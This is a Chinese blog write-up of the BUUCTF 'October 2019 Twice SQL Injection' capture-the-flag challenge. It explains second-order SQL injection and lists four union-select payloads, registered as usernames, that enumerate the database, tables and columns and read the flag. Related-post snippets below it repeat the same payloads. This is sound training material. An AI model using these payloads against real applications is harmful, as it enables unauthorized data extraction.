buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解

最新推荐文章于 2023-04-23 11:45:24 发布
最新推荐文章于 2023-04-23 11:45:24 发布
阅读量2.1k 收藏 5
点赞数 2
分类专栏: CTF -WEB 学习 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122059073
版权

这里要吐槽一点XCTF,之前翻题目时发现有道10分的,还是二次注入,还是0人做出,看了write up觉得还挺简单,就想混着写一下,结果0人做出的原因居然是环境打不开。然后在buuctf 平台找到了这道题,所以就试着写下write up。

 

目录

二次注入

二次注入的成因

二次注入常出现的地方

题解

思路

 步骤

二次注入

二次注入的成因

  • 由于开发者为了防御sql注入,使网站对我们输入的恶意语句中的一些重要的关键字进行了转义,使恶意的sql注入无法执行(比如说将单引号转义,使其无法闭合)
  • 但是数据库存储我们的数据时,输入的恶意的语句又被还原成转义之前的语句(数据库又没有对存储的数据进行检查,默认存储的数据都是无害的)
  • 这时仍然没有被攻击,但是当我们数据库在进行查询时,如果调用了这条信息,就可能会产生sql注入。

所以要说明的是,二次注入的产生是需要以上一些特定的条件的。所以二次注入一般比较难发现

二次注入常出现的地方

  • 用户注册和登陆
  • 用户修改密码

题解

思路

接下来我们说的详细一点:
首先判断,为什么存在二次注入

我们首先注册,登陆,都使用了sql语句发现无果,
然后我们进入Info页面,进行一个简单的sql语句 发现服务器并没有过滤掉关键字,只是将我们的
单引号用\转义。

这个时候就是存在二次注入的一个必要条件

所以我们接下来就通过
1.注册恶意用户名 
2.登陆, 在登陆过程中,肯定要将我们输入的数据和数据库进行比对,而在这个
查询数据库中的用户名进行比对的这个过程中,会执行我们插入数据库的用户名(也就是恶意sql注入语句)
所以使用下面4个恶意用户名,分别注册4个账号,进行登陆操作,一步一步爆出来

1' union select database() #
1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #
1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
1' union select flag from flag #

下面给出一些步骤

 步骤

注册 用户名为: 1' union select database() #  密码:111

 点击Register ,注册成功

点击Register 后,到达Login页面,输入账户密码

用户名为: 1' union select database() #  密码:111

 

点击登陆,爆出了数据库。

 接下来重复操作,注册-登陆-爆出信息,依次获取表名,字段名,字段值,最终得到flag。

表名

 字段名

 字段值(flag)

AAAAAAAAAAAA66
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF mfc逆向-200
12-22
发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息(具体的好像是Windows的消息机制,菜鸡如我,不了解) 大佬是用C++写的程序给这个控件发送一个消息。(我也不晓得这...
buu-October 2019 Twice SQL Injection
qaq517384的博客
10-26 525
标题朴实无华的二次注入 两个注入点,注册和改info rua' union select database() # 在注册的user处可以找到二次注入点 没有特殊的过滤,四步正常走就行 rua' union select database() # rua' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # rua' union select gro
BUUCTF--October 2019 Twice SQL Injection
qq_46263951的博客
07-30 1098
根据题目可以知道这是一个二次注入题 注册时把我们sql语句放到username处,登录后即可看到我们想要的信息 payload为: username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select gr
[October 2019]Twice SQL Injection
J_linnb的博客
04-23 443
一. 题目是二次SQL注入,我们先了解一下二次注入原理二次注入原理,在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。 在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一
buuctf-web-October 2019 Twice SQL Injection1
mlws1900的博客
03-12 220
重新注册账号为admin' union select database()#,密码123456(此处此方法无用,账号必须是数字)随后就是sql注入常规操作,爆库爆表爆字段读内容,继续注册账户名带注入语句的用户。注册账号为1' union select database()#,密码为123。重新登录,发现显示数据库为ctftraining。到注册界面随便注册一个用户后登录。看这题目,二次注入,打开环境。
Twice SQL Injection
追求卓越,技术流~
11-30 254
注册一个脏的数据,这个数据储存在数据库中,并没有执行任何结果,通过登入访问的时候,会结合sql语句执行拼接语句。注册一个账号,并且这个账号是脏数据,Username:admin’# Password:123。所以现在有一个数据用户名是admin,可能是用户。
一天一道ctf 第50天(二次注入
scrawman的博客
08-09 334
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 查看源代码,可能有文件包含漏洞,直接读取是不行的,要用filter伪协议:?file=php://filter/convert.base64-encode/resource=index.php同样还可以拿到change.php,delete.php,confirm.php的源码。 代码审计,可以发现对SQL注入的参数进行了很严的过滤,但既然是题目肯定会给你造漏洞,就找那些过滤方法不一样的参数就行了。user_name和phone都用
CTF| 简易留言板
qq_42646885的博客
07-08 2886
打开网址是个简易留言板,有两个输入框可以输入。 随便输入几个字符提交后,发先提交一条记录返回四个信息。这四个信息中,姓名和内容是由输入内容决定的,其他两个时间和ID是不可控的,时间获取的是当前时间,可能是使用了SQL的now()函数,ID可能是从1自动增长的。 试下注入,输入一个单引号',提示留言失败。在昵称输入两个单引号,留言成功,昵称显示只有一个单引号。这个应该是Insert二次注...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
SQL INJECTION注入之经典教程
06-28
关于SQL注入的两篇经典文章,国外的专业机构写的.对于有一定SQL编程经验又想了解SQL inject的人来说是不错的教程.
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
BUUCTF:[XDCTF 2015]filemanager —php代码审计 + 文件上传 + sql闭合语句注入数据库 + 二次注入
Zero_Adam的博客
04-25 651
0、前置知识点: 1. pathinfo()
dedecms /plus/stow.php Twice SQL Injection
weixin_34250709的博客
05-19 407
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考   1. 漏洞描述 收藏文章功能$title变量未过滤,造成二次注入 Relevant Link: http://www.wooyun.org/bugs/wooyun-2013-046375 2. 漏洞触发条件 0x1: 发布一个特殊...
二次注入
kuiguowei的博客
01-12 8180
二次注入SQL注入的一种,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏。 那为什么需要二次注入,因为在字符型注入一般都有单引号的存在,首先构造注入闭合单引号,再通过第二次构造语句,在第一次注入的基础上进行注入。 步骤1:代码审计 在之前的审计课程中我们已经对网站的大部分功能
SQL注入二次注入
Devil_ping的博客
02-10 587
一个登陆页面 登录 不能注入 注册 不能覆盖 发现可以找到哪些用户已经被被注册 修改密码 发现各密码字段不能注入 这些都做了转义,但是注册没有对一些特殊符号进行限制,我们修改密码的时候,使用了这个语句,便造成了这个二次注入 实验 注册一个admin' -- -用户密码123.com 创建成功 ...
sql注入——二次注入
cxrpty的博客
02-10 2042
二次注入原理,主要分为两步 第一步:插入恶意数据 第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留的原来的数据,但是数据本身包含恶意内容。 第二步:引用恶意数据 在将数据存入数据库后,开发者认为数据是可信的,在下一次需要进行的查询的时候,直接从数据库中提出了恶意数据,没有进行进一步的检验和...
Pwn The Box——Twice SQL Injection
龙狼刺的博客
08-13 919
Twice SQL Injection
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值